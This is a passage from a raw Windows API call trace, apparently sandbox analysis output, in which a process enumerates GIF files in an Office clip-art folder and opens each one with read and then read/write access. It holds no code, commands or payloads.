0x885b8 [0100.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.537] AreFileApisANSI () returned 1 [0100.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0100.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 69 [0100.537] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x319e)) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0100.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.537] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd9c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00120_.GIF", cAlternateFileName="")) returned 1 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0100.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.538] AreFileApisANSI () returned 1 [0100.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0100.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.538] AreFileApisANSI () returned 1 [0100.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0100.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 69 [0100.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.539] GetFileType (hFile=0x368) returned 0x1 [0100.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0100.539] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.539] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.539] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.539] CloseHandle (hObject=0x368) returned 1 [0100.540] AreFileApisANSI () returned 1 [0100.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 69 [0100.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.540] GetFileType (hFile=0x368) returned 0x1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.540] CloseHandle (hObject=0x368) returned 1 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.541] AreFileApisANSI () returned 1 [0100.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 69 [0100.541] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd9c)) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0100.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.542] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00126_.GIF", cAlternateFileName="")) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.542] AreFileApisANSI () returned 1 [0100.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0100.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.543] AreFileApisANSI () returned 1 [0100.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 69 [0100.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.543] GetFileType (hFile=0x368) returned 0x1 [0100.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.543] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.543] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.544] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.544] CloseHandle (hObject=0x368) returned 1 [0100.544] AreFileApisANSI () returned 1 [0100.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 69 [0100.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.544] GetFileType (hFile=0x368) returned 0x1 [0100.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.544] CloseHandle (hObject=0x368) returned 1 [0100.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0100.545] RtlAllocateHeap 